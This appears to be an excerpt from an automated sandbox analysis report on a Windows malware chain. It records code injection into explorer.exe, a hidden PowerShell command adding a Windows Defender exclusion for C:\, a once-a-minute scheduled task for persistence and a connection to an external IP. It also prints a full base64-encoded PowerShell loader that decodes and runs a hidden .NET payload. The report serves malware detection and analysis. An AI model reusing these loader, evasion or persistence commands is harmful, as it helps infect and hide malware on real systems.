Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_2_0040170C HeapCreate,HeapAlloc,HeapAlloc,GetModuleHandleA,HeapAlloc,CreateEventA,memcpy,HeapAlloc,memcpy,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,HeapAlloc,memcpy,memcpy,HeapFree,WaitForSingleObject,FindCloseChangeNotification,VirtualFree,GetProcessHeap,HeapFree,HeapDestroy, 23_2_0040170C
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 13_2_0000024AB87F1A90
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059A4ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0059A4ED
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058162A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0058162A
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00580C5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00580C5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: gfiecjd.21.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.196.8.137 80
Yara detected Powershell dedcode and execute
Source: Yara match File source: amsi32_5720.amsi.csv, type: OTHER
Source: Yara match File source: C:\Users\user\UndLdl.ps1, type: DROPPED
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00566990 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 24_2_00566990
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Thread created: C:\Windows\explorer.exe EIP: 1121950
Source: C:\Users\user\AppData\Roaming\gfiecjd Thread created: unknown EIP: 11E1950
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded Q1|
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded Q1| Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 5084 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 2300 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 748 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 5380 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 7044 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 6756 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3172 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3660 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3688 base: 9079C0 value: 90
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\gfiecjd Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\gfiecjd Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe "C:\Users\user\AppData\Roaming\D4C0.vmt.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\F324.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('znvuy3rpb24grgvjb21wcmvzc0j5dgvzkcrjb21wcmvzc2vkrgf0yskgeyakbxmgpsbbsu8utwvtb3j5u3ryzwftxto6bmv3kchbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrjb21wcmvzc2vkrgf0yskpktsgjg1zllbvc2l0aw9uid0gmdsgjgrlzmxhdgvtdhjlyw0gpsbbsu8uq29tchjlc3npb24urgvmbgf0zvn0cmvhbv06om5ldygkbxmsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsgjgj1zmzlcia9iftiexrlw11dojpuzxconda5nik7icrtcya9iftjty5nzw1vcnltdhjlyw1dojpuzxcoktsgd2hpbgugkcr0cnvlksb7icrjb3vudca9icrkzwzsyxrlu3ryzwftlljlywqojgj1zmzlciwgmcwgjgj1zmzlci5mzw5ndggpoybpziaojgnvdw50ic1lcsawksb7igjyzwfrih0gjg1zlldyaxrlkcridwzmzxisidasicrjb3vudckgfsakzgvmbgf0zvn0cmvhbs5dbg9zzsgpoyakbxmuvg9bcnjhesgpih0ncg0kznvuy3rpb24gumv2zxjzzvn0cmluzygkaw5wdxrtdhjpbmcpihsnciagicaky2hhckfycmf5id0gjgluchv0u3ryaw5nllrvq2hhckfycmf5kckgicmgq29udmvydcbzdhjpbmcgdg8gy2hhcmfjdgvyigfycmf5dqogicagjhjldmvyc2vkqxjyyxkgpsaky2hhckfycmf5wy0xli4tkcrjagfyqxjyyxkutgvuz3rokv0gicmgumv2zxjzzsb0agugyxjyyxknciagicakcmv2zxjzzwrtdhjpbmcgpsatam9pbiakcmv2zxjzzwrbcnjhesagiybdb252zxj0ihrozsbyzxzlcnnlzcbhcnjhesbiywnrihrvigegc3ryaw5ndqogicagcmv0dxjuicryzxzlcnnlzfn0cmluzw0kfq0kdqpmdw5jdglvbibdbg9zzs1qcm9jzxnzihsnciagicbwyxjhbsgnciagicagicagw3n0cmluz10kuhjvy2vzc05hbwunciagicapdqonciagicakchjvy2vzcya9iedldc1qcm9jzxnzic1oyw1licrqcm9jzxnztmftzsatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zq0kdqogicagawygkcrwcm9jzxnzic1uzsakbnvsbckgew0kicagicagicbtdg9wlvbyb2nlc3mglu5hbwugjfbyb2nlc3noyw1lic1gb3jjzq0kcx0ncn0ncg0kznvuy3rpb24gq29udmvydc1bc2npavrvu3ryaw5nkcrhc2npaufycmf5kxsncirvzmztzxrjbnrlz2vypteymzsncirkzwnvzgvku3ryaw5npsrodwxsow0kzm9yzwfjacgkyxnjawljbnrlz2vyigluicrhc2npaufycmf5kxskzgvjb2rlzfn0cmluzys9w2noyxjdkcrhc2npauludgvnzxitjg9mzlnldeludgvnzxipftsncnjldhvybiakzgvjb2rlzfn0cmluz307dqoncirlbmnvzgvkqxjyyxkgpsbakde1oswymjasmjm4ldizocwymjqsmjmyldiymswymzesmjq0lde2oswxotismjmzldizoswymzcsmjq0ldiwmywymzqsmji4ldizmywymzksmty5lde5niwymzmsmjqxldizncwymzasmji0lde2mywxntksmjmzldi0mcwymzesmjmxlde2nywxntksmjmzldi0mcwymzesmjmxlde2ncwxodipdqokzgvjb2rlzfn0cmluzya9ienvbnzlcnqtqxnjawlub1n0cmluzyakzw5jb2rlzefycmf5dqoncg0kjgzpbgvqyxroid0gsm9pbi1qyxroicrlbny6vxnlclbyb2zpbgugilvuzexkbc5iyxqidqokbgfzdexpbmugpsbhzxqtq29udgvudcatugf0acakzmlszvbhdgggfcbtzwxly3qtt2jqzwn0ic1myxn0idencirjbgvhbmvktgluzsa9icrsyxn0tgluzsatcmvwbgfjzsanxjo6jw0kjhjldmvyc2ugpsbszxzlcnnlu3ryaw5nicrjbgvhbmvktgluzq0kjgrly29tchjlc3nlzej5dgugpsbezwnvbxbyzxnzqnl0zxmglwnvbxbyzxnzzwreyxrhicryzxzlcnnldqoncirhc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqow2j5dgvbxv0kzgvjb21wcmvzc2vkqnl0zskncg0kjgfzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchbynl0zvtdxsrkzwnvbxbyzxnzzwrcexrlkq0kdqpjbnzva2utrxhwcmvzc2lvbiakzgvjb2rlzfn0cmluzw0kdqpdbg9zzs1qcm9jzxnzic1qcm9jzxnztmftzsaiy21kig==')) | out-file -filepath 'c:\users\user\undldl.ps1' -encoding utf8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('znvuy3rpb24grgvjb21wcmvzc0j5dgvzkcrjb21wcmvzc2vkrgf0yskgeyakbxmgpsbbsu8utwvtb3j5u3ryzwftxto6bmv3kchbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrjb21wcmvzc2vkrgf0yskpktsgjg1zllbvc2l0aw9uid0gmdsgjgrlzmxhdgvtdhjlyw0gpsbbsu8uq29tchjlc3npb24urgvmbgf0zvn0cmvhbv06om5ldygkbxmsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsgjgj1zmzlcia9iftiexrlw11dojpuzxconda5nik7icrtcya9iftjty5nzw1vcnltdhjlyw1dojpuzxcoktsgd2hpbgugkcr0cnvlksb7icrjb3vudca9icrkzwzsyxrlu3ryzwftlljlywqojgj1zmzlciwgmcwgjgj1zmzlci5mzw5ndggpoybpziaojgnvdw50ic1lcsawksb7igjyzwfrih0gjg1zlldyaxrlkcridwzmzxisidasicrjb3vudckgfsakzgvmbgf0zvn0cmvhbs5dbg9zzsgpoyakbxmuvg9bcnjhesgpih0ncg0kznvuy3rpb24gumv2zxjzzvn0cmluzygkaw5wdxrtdhjpbmcpihsnciagicaky2hhckfycmf5id0gjgluchv0u3ryaw5nllrvq2hhckfycmf5kckgicmgq29udmvydcbzdhjpbmcgdg8gy2hhcmfjdgvyigfycmf5dqogicagjhjldmvyc2vkqxjyyxkgpsaky2hhckfycmf5wy0xli4tkcrjagfyqxjyyxkutgvuz3rokv0gicmgumv2zxjzzsb0agugyxjyyxknciagicakcmv2zxjzzwrtdhjpbmcgpsatam9pbiakcmv2zxjzzwrbcnjhesagiybdb252zxj0ihrozsbyzxzlcnnlzcbhcnjhesbiywnrihrvigegc3ryaw5ndqogicagcmv0dxjuicryzxzlcnnlzfn0cmluzw0kfq0kdqpmdw5jdglvbibdbg9zzs1qcm9jzxnzihsnciagicbwyxjhbsgnciagicagicagw3n0cmluz10kuhjvy2vzc05hbwunciagicapdqonciagicakchjvy2vzcya9iedldc1qcm9jzxnzic1oyw1licrqcm9jzxnztmftzsatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zq0kdqogicagawygkcrwcm9jzxnzic1uzsakbnvsbckgew0kicagicagicbtdg9wlvbyb2nlc3mglu5hbwugjfbyb2nlc3noyw1lic1gb3jjzq0kcx0ncn0ncg0kznvuy3rpb24gq29udmvydc1bc2npavrvu3ryaw5nkcrhc2npaufycmf5kxsncirvzmztzxrjbnrlz2vypteymzsncirkzwnvzgvku3ryaw5npsrodwxsow0kzm9yzwfjacgkyxnjawljbnrlz2vyigluicrhc2npaufycmf5kxskzgvjb2rlzfn0cmluzys9w2noyxjdkcrhc2npauludgvnzxitjg9mzlnldeludgvnzxipftsncnjldhvybiakzgvjb2rlzfn0cmluz307dqoncirlbmnvzgvkqxjyyxkgpsbakde1oswymjasmjm4ldizocwymjqsmjmyldiymswymzesmjq0lde2oswxotismjmzldizoswymzcsmjq0ldiwmywymzqsmji4ldizmywymzksmty5lde5niwymzmsmjqxldizncwymzasmji0lde2mywxntksmjmzldi0mcwymzesmjmxlde2nywxntksmjmzldi0mcwymzesmjmxlde2ncwxodipdqokzgvjb2rlzfn0cmluzya9ienvbnzlcnqtqxnjawlub1n0cmluzyakzw5jb2rlzefycmf5dqoncg0kjgzpbgvqyxroid0gsm9pbi1qyxroicrlbny6vxnlclbyb2zpbgugilvuzexkbc5iyxqidqokbgfzdexpbmugpsbhzxqtq29udgvudcatugf0acakzmlszvbhdgggfcbtzwxly3qtt2jqzwn0ic1myxn0idencirjbgvhbmvktgluzsa9icrsyxn0tgluzsatcmvwbgfjzsanxjo6jw0kjhjldmvyc2ugpsbszxzlcnnlu3ryaw5nicrjbgvhbmvktgluzq0kjgrly29tchjlc3nlzej5dgugpsbezwnvbxbyzxnzqnl0zxmglwnvbxbyzxnzzwreyxrhicryzxzlcnnldqoncirhc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqow2j5dgvbxv0kzgvjb21wcmvzc2vkqnl0zskncg0kjgfzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchbynl0zvtdxsrkzwnvbxbyzxnzzwrcexrlkq0kdqpjbnzva2utrxhwcmvzc2lvbiakzgvjb2rlzfn0cmluzw0kdqpdbg9zzs1qcm9jzxnzic1qcm9jzxnztmftzsaiy21kig==')) | out-file -filepath 'c:\users\user\undldl.ps1' -encoding utf8" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00581816 cpuid 24_2_00581816
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
